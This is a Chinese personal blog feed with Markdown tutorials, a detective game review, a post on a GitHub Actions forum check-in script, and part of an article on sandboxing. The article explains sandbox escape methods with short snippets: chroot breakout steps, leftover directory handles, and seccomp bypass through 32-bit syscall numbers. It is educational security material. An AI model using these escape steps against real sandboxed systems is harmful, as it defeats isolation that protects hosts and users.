<li><code>---:</code>右对齐</li>
</ul>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">|left|center|right|</span><br><span class="line">|:---|:--:|---:|</span><br><span class="line">|Jobs|Gates|Musk|</span><br><span class="line">|==Me==|Boyce|Young|</span><br></pre></td></tr></tbody></table></figure>

<table>
<thead>
<tr>
<th align="left">left</th>
<th align="center">center</th>
<th align="right">right</th>
</tr>
</thead>
<tbody><tr>
<td align="left">Jobs</td>
<td align="center">Gates</td>
<td align="right">Musk</td>
</tr>
<tr>
<td align="left">==Me==</td>
<td align="center">Boyce</td>
<td align="right">Young</td>
</tr>
</tbody></table>
<p>==可以在表格中使用Markdown语法==</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>以上就是Markdown基础教程（以Typora为例）的全部内容。之后会找时间更新<strong>进阶教程</strong>。<br>上面的代码希望大家能自己敲一遍。光凭看去学任何语言，哪怕是Markdown这样的轻量标记语言，都是低效的。</p>
<blockquote>
<p>”一个人在科学探索的道路上走过弯路犯过错误并不是坏事,更不是什么耻辱,要在实践中勇于承认和改正错误。“</p>
<p>——爱因斯坦</p>
</blockquote>
<p><strong>纠错：==包裹文字高亮语法是markdown高级语法，各平台支持度不一样。如果要在不支持该语法的平台使用可以尝试用css</strong></p>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>Markdown</tag>
      </tags>
  </entry>
  <entry>
    <title>Markdown进阶教程（以Typora为例）</title>
    <url>/posts/mdLearn2/</url>
    <content><![CDATA[<p><a id="1">此篇博客是进阶教程</a><br>建议零基础小白先食用：<a href="https://bowenyoung.cn/posts/mdLearn/">基础教程</a></p>
<span id="more"></span>

<h2 id="目录写法"><a href="#目录写法" class="headerlink" title="目录写法"></a>目录写法</h2><p>在任意位置添加<code>[TOC]</code>即可显示树状结构文章目录。显示效果可以参考本文目录：下图。</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://cdn-img.afdelivr.top/2022/06/12/62a53bbd6d419.png" data-fancybox="one" data-caption="目录"><img fancybox="" itemprop="contentUrl" src="https://cdn-img.afdelivr.top/2022/06/12/62a53bbd6d419.png" class="lazyload" data-srcset="https://cdn-img.afdelivr.top/2022/06/12/62a53bbd6d419.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="目录"></a><span class="image-caption">目录</span></div></div>




<h2 id="锚（跳转）"><a href="#锚（跳转）" class="headerlink" title="锚（跳转）"></a>锚（跳转）</h2><p>有两种方法：</p>
<ol>
<li><p>Markdown原生：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">跳转的终点（锚）：同html,见下</span><br><span class="line">跳转的起点（链接）：[显示的内容](#id)</span><br><span class="line">可以理解为跳转终点（锚）定义了一个名为id的元素，而跳转起点则是一个指向该元素的链接</span><br><span class="line">例如：文章第一句话的写法：&lt;a id="1"&gt;此篇博客是进阶教程&lt;/a&gt;，下面一行是跳转起点：[跳转至开头](#1)</span><br></pre></td></tr></tbody></table></figure>

<p><a href="#1">跳转至开头</a> ←点击此处查看效果<br><strong>注：id这里建议写英文或数字，不要写中文，可能会出错</strong></p>
</li>
<li><p>HTML写法：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">跳转终点：&lt;a id="xxx"&gt;显示的内容&lt;/a&gt;</span><br><span class="line">跳转起点：&lt;a href="#xxx"&gt;显示的内容&lt;/a&gt;</span><br><span class="line">除了a标签外，用p,div,span等标签也有效（将a改成p,div或span）</span><br><span class="line">例如：文章第一句话的写法：&lt;a id="1"&gt;此篇博客是进阶教程&lt;/a&gt;，下面一行是跳转起点：&lt;a href="#1"&gt;跳转至开头&lt;/a&gt;</span><br></pre></td></tr></tbody></table></figure>

<p><a href="#1">跳转至开头</a>←点击此处查看效果<br><strong>注：若要跳转到零一页面的锚，在终点的<code>#xxx</code>之前添加文件名（如1.html）即可</strong></p>
</li>
</ol>
<h2 id="To-do-list（任务列表）"><a href="#To-do-list（任务列表）" class="headerlink" title="To-do list（任务列表）"></a>To-do list（任务列表）</h2><ul>
<li>未完成：<code>- [ ] </code>		短横+空格+左方括号+空格+右方括号+空格</li>
<li>已完成：<code>-[x] </code>		短横加空格+左方括号+字母x+右方括号+空格</li>
</ul>
<p><strong>注意-和[]中间一定要加空格、后面爷要加空格，未完成的写法[]中间有空格</strong></p>
<p>举例：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">- [ ] 学习</span><br><span class="line">- [x] 打游戏</span><br><span class="line">- [x] 看电影</span><br></pre></td></tr></tbody></table></figure>

<p>效果：</p>
<ul>
<li><input disabled="" type="checkbox"> 学习</li>
<li><input checked="" disabled="" type="checkbox"> 打游戏</li>
<li><input checked="" disabled="" type="checkbox"> 看电影</li>
</ul>
<h2 id="脚注"><a href="#脚注" class="headerlink" title="脚注"></a>脚注</h2><p><strong>由于本站源代码问题，脚注没有被很好地显示出来！</strong></p>
<p>如果有参考文献或文章之类的话应该要用的<br>正文中脚注的编号用<code>[^1],[^2],[^3]</code>等，尾部注释对应用<code>[^1]: 注释内容</code>，<code>[^2]: 注释内容</code> ，<code>[^3]: 注释内容</code>等<br>脚注编号显示在文字右上角，鼠标移上去会显示注释内容</p>
<p>举例：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">他[^1]</span><br><span class="line">文末处：[^1]: 黑框眼镜</span><br></pre></td></tr></tbody></table></figure>

<p>正文效果：他<a href="%E9%BB%91%E6%A1%86%E7%9C%BC%E9%95%9C">^1</a>（注释在文末）</p>
<h2 id="Unicode特殊字符-emoji"><a href="#Unicode特殊字符-emoji" class="headerlink" title="Unicode特殊字符(emoji)"></a>Unicode特殊字符(emoji)</h2><p>格式为<code>&amp;#数字;</code>，其实是HTML<br>举例：<code>&amp;#937;</code>为Ω，<code>&amp;#952;</code>为θ。</p>
<p>unicode字符包含的内容非常之多，最典型的还属emoji。如<code>&amp;#128517;</code>😅<code>&amp;#129299;</code>🤓</p>
<p><a href="https://unicode-table.com/cn/">这里是unicode的参考网址</a></p>
<h2 id="支持HTML的典型例子"><a href="#支持HTML的典型例子" class="headerlink" title="支持HTML的典型例子"></a>支持HTML的典型例子</h2><h3 id="音频"><a href="#音频" class="headerlink" title="音频"></a>音频</h3><p>html5语法：</p>
<figure class="highlight html"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">audio</span> <span class="attr">src</span>=<span class="string">"音频文件路径"</span>&gt;</span></span><br><span class="line">不能播放时的报错信息</span><br><span class="line"><span class="tag">&lt;/<span class="name">audio</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>

<p>举例：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;audio src="audio.mp3"&gt;</span><br><span class="line">您的浏览器不支持播放该音频</span><br><span class="line">&lt;/audio&gt;</span><br></pre></td></tr></tbody></table></figure>



<h3 id="视频"><a href="#视频" class="headerlink" title="视频"></a>视频</h3><p>同为html5语法：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;video src="视频文件路径"&gt;</span><br><span class="line">不能播放时的报错信息</span><br><span class="line">&lt;/video&gt;</span><br></pre></td></tr></tbody></table></figure>

<p>举例：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;video src="video.mp4"&gt;</span><br><span class="line">您的浏览器不支持播放该音频</span><br><span class="line">&lt;/video&gt;</span><br></pre></td></tr></tbody></table></figure>



<h3 id="改变字体颜色和大小"><a href="#改变字体颜色和大小" class="headerlink" title="改变字体颜色和大小"></a>改变字体颜色和大小</h3><p>语法:</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;font  color=#00ffff size=7 face="纯书法字体"&gt;青色7号纯书法字体&lt;/font&gt;</span><br><span class="line">或者</span><br><span class="line">&lt;font color=cyan size=7 face="纯书法字体"&gt;或者可以这么写&lt;/font&gt;</span><br></pre></td></tr></tbody></table></figure>

<p>显示效果:</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://cdn-img.afdelivr.top/2022/06/12/62a53bbcebedc.png" data-fancybox="one" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://cdn-img.afdelivr.top/2022/06/12/62a53bbcebedc.png" class="lazyload" data-srcset="https://cdn-img.afdelivr.top/2022/06/12/62a53bbcebedc.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>




<h2 id="Markdown制图-2"><a href="#Markdown制图-2" class="headerlink" title="Markdown制图^2"></a>Markdown制图<a href="%E5%8F%82%E8%80%83%3Chttps://blog.csdn.net/adorable_/article/details/117780977">^2</a></h2><p>Markdown可以绘制很多图,如时序图、甘特图、mermaid流程图、flow流程图等。<br>这里主要介绍flow流程图。其他的图可以参考这篇CSDN博客：<a href="https://blog.csdn.net/qq_14920635/article/details/109033143?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164993699816780264064499%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&amp;request_id=164993699816780264064499&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~hot_rank-1-109033143.142%5Ev8%5Epc_search_result_cache,157%5Ev4%5Econtrol&amp;utm_term=markdown%E7%BB%98%E5%9B%BE&amp;spm=1018.2226.3001.4187">点击跳转</a><br>首先，用一对3个`包裹代码块并在第一处后输入flow，确定这一段代码用flow来编写<br>然后就是绘制流程图的步骤。绘制流程图可以分为两步：</p>
<ol>
<li>定义元素（框框和里面的内容）：<br> <code>元素名称=&gt;元素类型: 显示的内容:&gt;超链接URL</code>(:&gt;URL可以不要)<br> <strong>注意：<code>=&gt;</code>后不能有空格， <code>:</code>后需要有空格</strong><br> 元素类型有6种，分别为：</li>
</ol>
<ul>
<li><p>开始（椭圆形）：start</p>
</li>
<li><p>结束（椭圆形）：end</p>
</li>
<li><p>子程序（长得像圣旨诏书）：subroutine</p>
</li>
<li><p>操作（矩形）：operation</p>
</li>
<li><p>条件判断（菱形）：condition</p>
</li>
<li><p>输入输出（平行四边形）：inputoutput</p>
</li>
</ul>
<ol start="2">
<li>关联元素<br> 用 <code>-&gt;</code> 来关两个节点<br> 如果是 condition 节点将会有 yes/true 和 no/false 两个分支<br> left/right表示连线出口在节点位置（默认下面是出口，如con2），也可以跟condition变量一起用，如：con1(yes,right)</li>
</ol>
<p>举例：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">```flow</span><br><span class="line">start=&gt;start: 开始</span><br><span class="line">end=&gt;end: 结束</span><br><span class="line">in=&gt;inputoutput: 输入年份n</span><br><span class="line">con1=&gt;condition: n能否被4整除？</span><br><span class="line">con2=&gt;condition: n能被100整除？</span><br><span class="line">con3=&gt;condition: n能被400整除？</span><br><span class="line">out1=&gt;inputoutput: 输出闰年</span><br><span class="line">out2=&gt;inputoutput: 输出非闰年</span><br><span class="line"></span><br><span class="line">start(right)-&gt;in-&gt;con1(yes,right)-&gt;con2(yes)-&gt;con3(yes)-&gt;out1-&gt;end</span><br><span class="line">con1(no)-&gt;con2-&gt;end</span><br><span class="line">con2(no,right)-&gt;out1</span><br><span class="line">con3(no)-&gt;out2</span><br><span class="line">```</span><br></pre></td></tr></tbody></table></figure>

<p>效果：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="one"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://cdn-img.afdelivr.top/2022/06/12/62a53bbdd95cc.png" data-fancybox="one" data-caption="flow流程图"><img fancybox="" itemprop="contentUrl" src="https://cdn-img.afdelivr.top/2022/06/12/62a53bbdd95cc.png" class="lazyload" data-srcset="https://cdn-img.afdelivr.top/2022/06/12/62a53bbdd95cc.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="flow流程图"></a><span class="image-caption">flow流程图</span></div></div>





<h2 id="数学公式"><a href="#数学公式" class="headerlink" title="数学公式"></a>数学公式</h2><p>原生的Markdown是不支持LaTex的，但如果用Typora则支持LaTex预览<br>最后的显示效果取决于用什么软件编译和导出</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>本博客名为教程，实则是个人学习Markdown的一些学习经验分享，不保证完全正确和详尽。欢迎指正错误，也欢迎留言分享哦！</p>
<p>今日一言：</p>
<blockquote>
<p>我选择沉默的主要原因之一：从话语中，你很少能学到人性，从沉默中却能。假如还想学得更多，那就要继续一声不吭 。</p>
<p>—— 王小波</p>
</blockquote>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>Markdown</tag>
      </tags>
  </entry>
  <entry>
    <title>《山河旅探》(Murders on the Yangtze River) 通关简评</title>
    <url>/posts/murders-on-the-yangtze-river/</url>
    <content><![CDATA[<p>收到朋友的安利，趁着过年打折入手了《山河旅探》。其实我此前很少玩推理游戏，可能是因为以前玩剧本杀时我也鲜有准确的推理。一开始吸引我的，是《山河旅探》的水墨风以及据说精彩的剧情。事实证明，《山河旅探》不只有这些优点。</p>
<h2 id="画风"><a href="#画风" class="headerlink" title="画风"></a>画风</h2><div class="tag-plugin swiper-container" width="max"><div class="swiper-wrapper"><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2024/02/16/65cf5c075dc14.jpg"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2024/02/16/65cf5c8e54edf.jpg"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2024/02/16/65cf5d0761ba9.jpg"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2024/02/16/65cf5a45b21e5.jpg"></div><div class="swiper-slide"><img no-lazy="" src="https://bu.dusays.com/2024/02/16/65cf5d2ccdbaa.jpg"></div></div><div class="swiper-pagination"></div><div class="swiper-button-prev blur"></div><div class="swiper-button-next blur"></div></div>

<p>《山河旅探》是一款横轴的推理探案游戏，故事发生在清末民初——正是中国封建主义社会受到到西方政治文化强烈冲击的年代。因此游戏画面即包含田野乡间、官府衙门，也包含汉阳铁厂、轮船、上海街头、会审公廨（中国近代史上外国租界内的司法审判机构，在这些机构内由租界国领事与中国官员共同审理案件）等场景，跨度非常大。比起某些国产动漫（比如《雾山五行》），《山河旅探》的水墨风不算震撼，但是场景的细节都做得不错。</p>
<h2 id="剧情"><a href="#剧情" class="headerlink" title="剧情"></a>剧情</h2><p>游戏明暗线交织，6个发生在不同地点的案件串联起来的故事，在最后的结局中汇聚、迸发。虽然仅仅10小时左右的游戏时长，但是将许多人物都刻画得立体鲜明——自私的、为祖国事业奋斗的、迷信的、进步的、公正的、伪善的……游戏很好地将故事背景融入到了故事和人物当中，每个人物都是那个年代某一批人的群像。而从案情上来讲，作为一个推理游戏，作案、探案的逻辑经得起推敲，需要细细琢磨。不少案件中的作案手法也是让我觉得脑洞大开。</p>
<h2 id="玩法"><a href="#玩法" class="headerlink" title="玩法"></a>玩法</h2><p>一开始我已经准备好将这个游戏当作视觉小说去玩了，但是一上手我就知道不带脑子不行了。游戏的玩法比较丰富：作案工具指认、证物指认、证人指认、证言之间的矛盾指认、证言与证物之间的矛盾指认、尸体勘察、现场勘察等，还原了实际探案的大多数流程，十分有代入感。难度上，有个别场景的推理比较难，但大多数时间里我都能做出正确的推理。游戏中也有一些简单的小游戏用于调整节奏。由于之前没有玩过相同类型的推理游戏，因此玩法对于我来说足够新鲜也足够丰富。</p>
<h2 id="配音-x2F-配乐"><a href="#配音-x2F-配乐" class="headerlink" title="配音/配乐"></a>配音/配乐</h2><p>游戏中有不少外国人（英国人），英文配音的伦敦腔挺冲，有种在听小学英语听力的感觉，不过倒是符合人物设定。游戏中还有一段是外国人说着蹩脚中文，此时的字幕也是故意使用错别字，挺有趣。美中不足的是有些片段只有字幕没有配音。以及部分配音片段明显前后音色有差距，有些出戏。</p>
<p>游戏的配乐十分出彩，做到了根据剧情的变化无缝切换，能很好地让玩家沉浸到游戏中去。由于一个人在老家的大房子里玩，时常被剧情配合背景音乐吓得心慌。</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p><img src="https://bu.dusays.com/2024/02/16/65cf6a684127c.jpg" class="lazyload" data-srcset="https://bu.dusays.com/2024/02/16/65cf6a684127c.jpg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></p>
<p>游戏中会通过收藏夹的方式介绍非常多的史实和知识，对于我这种一年读不了几本闲书的人来说非常有趣。同时这种方式也能让玩家更好地了解背景知识、更能够代入到每一个角色中去。</p>
<p>之前也听说这部作品从《逆转裁判》系列中借鉴了许多，不过我没有玩过《 逆转裁判》系列，因此不能做一个客观的评价。但这部作品在结尾致谢了许多参与制作的人员以及借鉴的游戏、小说等各种作品，借鉴的作品在首页能够点开的开发者寄语中也有：</p>
<p><img src="https://bu.dusays.com/2024/02/16/65cf6b2fd6e3c.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/02/16/65cf6b2fd6e3c.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></p>
<p>那么至少游戏制作方是心怀感激、尊重知识产权的，这点就值得国内许多游戏厂商学习了。之后也会再品鉴《逆转裁判》系列，以便更好地评价该作。</p>
]]></content>
      <categories>
        <category>游戏</category>
      </categories>
      <tags>
        <tag>推理</tag>
        <tag>2D</tag>
      </tags>
  </entry>
  <entry>
    <title>基于GitHub Actions的看雪论坛自动签到，可选推送与否</title>
    <url>/posts/pediy-CheckIn/</url>
    <content><![CDATA[<p><a href="https://bbs.pediy.com/">看雪论坛</a>称得上是国内较好的安全论坛了。不过要1k雪币（论坛虚拟币，新用户几乎都可以获得220及以上）才可以升级为正式会员。临时会员有诸多限制，包括不能查看『WEB安全』版块等。对于我这种想白嫖的安全小白来说，唯一的方法就是每天签到随机获得1-10枚雪币。但是我经常会忘记签到，这等到猴年马月？<br>正好我最近正在学习JS，于是写了一个自动签到的脚本。当然，除了升级正式会员，雪币还有许多用处，所以对已经是正式会员的用户来说也还算有些用罢。</p>
<p>先上传送门：</p>
<div class="tag link"><a class="link-card" title="pediy-CheckIn" href="https://github.com/BeaCox/pediy-CheckIn"><div class="left"><img src="https://github.githubassets.com/favicons/favicon.svg" class="lazyload" data-srcset="https://github.githubassets.com/favicons/favicon.svg" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></div><div class="right"><p class="text">pediy-CheckIn</p><p class="url">https://github.com/BeaCox/pediy-CheckIn</p></div></a></div>

<h2 id="实现方法"><a href="#实现方法" class="headerlink" title="实现方法"></a>实现方法</h2><p>这个脚本的实现非常简单。</p>
<ol>
<li>通过抓包可以发现，看雪论坛的签到是通过向<code>https://bbs.pediy.com/user-signin.htm</code>页面发送含Cookie的POST请求来实现的（也是绝大多数签到业务的设计逻辑），因此利用<a href="https://www.axios-http.cn/">Axios</a>库的API来向该页面发送请求，模拟用户签到。</li>
<li>签到完成后，将响应的数据赋值给一个对象，通过<code>response.data.code</code>和<code>response.data.message</code>来判断网络正常情况下，签到任务的三种可能情况。<ul>
<li><code>code == 0 &amp;&amp; message = &lt;签到获得雪币数&gt; </code>: 表示签到成功。推送消息显示`签到成功，获得${msg}雪币`。</li>
<li><code>code == -1 &amp;&amp; message == '您今日已签到成功'</code> : 表示已经签到过，此处为重复签到。推送消息显示’您今日已签到成功’。</li>
<li><code>code == -1 &amp;&amp; message == '请先登录'</code>: 表示Cookie验证失败。打印错误并不推送消息</li>
</ul>
</li>
<li>推送消息的功能利用<a href="https://www.pushplus.plus/">pushplus</a>提供的接口实现，因为比<a href="https://sct.ftqq.com/">Server酱</a>免费版限制少一些，当然后续可能会添加server酱等其他选项。同样是利用了Axios的库来向接口发送请求。可以参考<a href="https://www.pushplus.plus/doc/">pushplus文档中心</a></li>
<li>利用GitHub Actions，在GitHub提供的主机上用node运行js，通过<code>crontab</code>完成定时任务。</li>
<li>GitHub Actions在仓库60天以上没有任何活动时会被suspended（推迟），因此利用<a href="https://github.com/gautamkrishnar/keepalive-workflow">Keepalive Workflow</a>来使工作流按期运行。</li>
</ol>
<h2 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h2><p>希望各位能帮我点一个star✨（理直气壮）<br>由于这是我第一个js脚本，程序健壮性想必不甚好，欢迎大家提出issue和pr！</p>
]]></content>
      <categories>
        <category>项目</category>
      </categories>
      <tags>
        <tag>Actions</tag>
        <tag>javascript</tag>
      </tags>
  </entry>
  <entry>
    <title>沙箱与Docker</title>
    <url>/posts/sandboxing-docker/</url>
    <content><![CDATA[<h2 id="沙箱技术杂谈"><a href="#沙箱技术杂谈" class="headerlink" title="沙箱技术杂谈"></a>沙箱技术杂谈</h2><h3 id="为什么沙箱技术被称为沙箱技术？"><a href="#为什么沙箱技术被称为沙箱技术？" class="headerlink" title="为什么沙箱技术被称为沙箱技术？"></a>为什么沙箱技术被称为沙箱技术？</h3><p>在现实生活中，沙箱是一个装满沙子的小箱子，小孩儿们可以在沙箱里面发挥自己的想象力——建沙堡、画画等，而不会将沙子弄得满地都是。</p>
<p>在计算机安全领域，沙箱技术的主要目标是<strong>隔离和保护程序</strong>，以防止它们对系统或其他应用程序造成不必要的损害或干扰。</p>
<h3 id="沙箱技术的历史"><a href="#沙箱技术的历史" class="headerlink" title="沙箱技术的历史"></a>沙箱技术的历史</h3><p>早在上世纪60年代，就已经通过硬件实现了系统和进程代码的隔离。</p>
<p>80年代，通过硬件方法隔离不同进程的内存空间。VAX/VMS操作系统引入了”访问控制列表”的概念，允许管理员对文件和资源进行更细粒度的权限控制。这是隔离和控制访问的重要步骤。</p>
<p>90年代，互联网逐渐开始普及。产生了解释器和被解释的代码之间的隔离，以及Java虚拟机（JVM）等早期沙箱技术。</p>
<p>2000年左右，是针对浏览器的网络攻击最盛之时。</p>
<p>而2010年前后，现代沙箱技术崛起了，<strong>主要用于浏览器</strong>，让不被信任的代码、数据被放置于一个被隔离的进程中。当被隔离的进程（子进程）想要执行一些需要授权的操作时，需要向父进程（如Firefox）请求，得到允许后方可执行。</p>
<h2 id="沙箱逃逸"><a href="#沙箱逃逸" class="headerlink" title="沙箱逃逸"></a>沙箱逃逸</h2><h3 id="chroot"><a href="#chroot" class="headerlink" title="chroot()"></a>chroot()</h3><p><code>chroot()</code>系统调用最早于1979年出现在Unix系统，然后出现在BSD系统。这是一种传统沙盒。</p>
<p><code>chroot('/sandbox')</code>的作用是让调用该函数的进程以及其子进程<strong>认为根目录</strong>是<code>/sandbox</code>，在<code>/sandbox</code>中时，不能<code>cd ../</code>到真正的根目录，因此一定程度上限制了进程对<code>/sandbox</code>外资源的访问。</p>
<h4 id="路径穿越"><a href="#路径穿越" class="headerlink" title="路径穿越"></a>路径穿越</h4><p>考虑在根目录运行如下C代码（不完整）：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">chroot(<span class="string">"/sandbox"</span>);</span><br><span class="line">execl(<span class="string">"/busybox"</span>, <span class="string">"sh"</span>, <span class="number">0</span>); <span class="comment">// Busybox在单一的可执行文件中提供了精简的Unix工具集，在这可以理解为运行了一个Linux系统</span></span><br></pre></td></tr></tbody></table></figure>

<p>初看：<code>busybox</code>运行，它认为自己的根目录是<code>/sandbox</code>。但问题是，调用<code>chroot()</code><strong>不会自动更改工作目录</strong>，因此<code>busybox</code>的工作目录还在根目录，可能可以借由这个工作目录访问沙箱外的资源。</p>
<h4 id="资源未关闭"><a href="#资源未关闭" class="headerlink" title="资源未关闭"></a>资源未关闭</h4><p>仅仅执行<code>chroot()</code>，并不会将先前打开的资源（如文件）关闭（留下文件句柄）。</p>
<p>Linux中有许多后缀为<code>at</code>的系统调用，可以根据目录（的句柄）和相对路径找到文件。以下是一些例子：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">openat</span><span class="params">(<span class="type">int</span> dirfd, <span class="type">char</span> *pathname, <span class="type">int</span> flags)</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">execveat</span><span class="params">(<span class="type">int</span> dirfd, <span class="type">char</span> *pathname, <span class="type">char</span> **argv, <span class="type">char</span> **envp, <span class="type">int</span> flags)</span>;</span><br></pre></td></tr></tbody></table></figure>

<p>如果先前有打开的目录未释放句柄，那么很容易利用句柄访问任意文件。</p>
<h4 id="重复调用chroot"><a href="#重复调用chroot" class="headerlink" title="重复调用chroot()"></a>重复调用chroot()</h4><p>调用了一次<code>chroot()</code>后，如果没有明确限制，可以再次调用<code>chroot()</code>。考虑以下情况：</p>
<p>位于根目录为<code>/sandbox</code>的沙箱中（已经执行<code>chroot("/sandbox");</code>）。</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> springboard	<span class="comment"># 在沙箱的根目录中创建目录</span></span><br><span class="line"><span class="built_in">chroot</span> springboard	<span class="comment"># 现在进程认为/sandbox/springboard是它的根目录</span></span><br><span class="line"><span class="comment"># 但是现在工作目录是/sandbox，我们实际上处于进程所认为的根目录外面，因此不受限制</span></span><br><span class="line"><span class="comment"># chdir ../../</span></span><br><span class="line"><span class="comment"># 现在工作目录就是/</span></span><br><span class="line"><span class="comment"># 我们已经到达了真正的根目录</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="seccomp"><a href="#seccomp" class="headerlink" title="seccomp"></a>seccomp</h3><p><code>seccomp</code>被称作<strong>系统调用的防火墙</strong>。可以禁用某些系统调用，或者基于参数来禁用。<br>docker、chrome、firefox等，都依赖于<code>seccomp</code>。</p>
<p><code>seccomp</code>的规则将会被<code>children</code>继承</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line">scmp_filter_ctx ctx;										<span class="comment">//seccomp过滤规则的数据结构</span></span><br><span class="line">ctx = seccomp_init(SCMP_ACT_ALLOW);							<span class="comment">//初始化seccomp, 允许所有系统调用</span></span><br><span class="line">seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), <span class="number">0</span>); 	<span class="comment">//禁止 execve 系统调用</span></span><br><span class="line">seccomp_load(ctx);											<span class="comment">//应用规则</span></span><br><span class="line"></span><br><span class="line">execl(<span class="string">"/bin/cat"</span>, <span class="string">"cat"</span>, <span class="string">"/flag"</span>, (<span class="type">char</span> *)<span class="number">0</span>);				<span class="comment">//这个函数会调用 execve，将被 kill</span></span><br></pre></td></tr></tbody></table></figure>

<p>更多使用方法：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">man seccomp_rule_add</span><br></pre></td></tr></tbody></table></figure>

<h4 id="宽松的过滤规则"><a href="#宽松的过滤规则" class="headerlink" title="宽松的过滤规则"></a>宽松的过滤规则</h4><p>Linux系统现在有300多种系统调用，且仍然在不断更新，十分复杂。沙箱应用开发者为了功能、性能或方便，可能会制定相对宽松的过滤规则。有些未被允许的系统调用就有可能被用于逃逸。</p>
<h4 id="系统调用混淆"><a href="#系统调用混淆" class="headerlink" title="系统调用混淆"></a>系统调用混淆</h4><p>许多64位架构向后兼容了32位。在amd64等架构中，你可以在同一个进程中切换32/64位模式。</p>
<p>不过有趣的是，不同架构（甚至是同一个架构的32/64位）的系统调用号不一样。例如：</p>
<p><code>exit()</code>在amd64中号码是60，在x86中是1。</p>
<p>在amd64操作系统中，<code>seccomp</code>默认配置的是amd64下允许/禁用的系统调用。如果允许两种模式下的系统调用，那么沙盒很可能顾此失彼。</p>
<p>考虑下面这种情况：</p>
<table>
<thead>
<tr>
<th>系统调用号</th>
<th>amd64</th>
<th>x86</th>
</tr>
</thead>
<tbody><tr>
<td>3</td>
<td>close</td>
<td>read()</td>
</tr>
<tr>
<td>4</td>
<td>stat()</td>
<td>write()</td>
</tr>
<tr>
<td>5</td>
<td>fstat()</td>
<td>open()</td>
</tr>
</tbody></table>
<p>如果开发者在配置规则时，本意是允许<code>close()</code>,   <code>stat()</code>,  <code>fstat()</code>系统调用，但由于<code>seccomp</code>是<strong>根据系统调用号进行过滤</strong>，当我们使用32位的指令进行系统调用时，我们竟然可以调用<code>open</code>, <code>read</code>, <code>write</code>——这意味着我们可以读取文件的内容并输出到其他文件或标准输出等。</p>
<h4 id="内核漏洞"><a href="#内核漏洞" class="headerlink" title="内核漏洞"></a>内核漏洞</h4><p>如果沙盒的<code>seccomp</code>被正确配置，攻击者很难发起有用的攻击。但是，用户仍然可以调用在白名单中的系统调用。如果内核中含有漏洞，通过系统调用，攻击者就可能利用这些内核漏洞。</p>
<p>听起来很玄乎，但其实内核与普通软件一样，都是代码，都或多或少存在漏洞，单是2019年一年，就有超过30个Chrome沙盒逃逸，其中大部分利用了内核漏洞。</p>
<h4 id="namespace——现代解决方案"><a href="#namespace——现代解决方案" class="headerlink" title="namespace——现代解决方案"></a>namespace——现代解决方案</h4><p>命名空间是 Linux 中可用的功能，用于隔离不同系统资源方面的进程。在Linux中有很多namespace，包括：</p>
<ul>
<li>mnt（挂载点，文件系统）</li>
<li>pid（进程）</li>
<li>net（网络堆栈）</li>
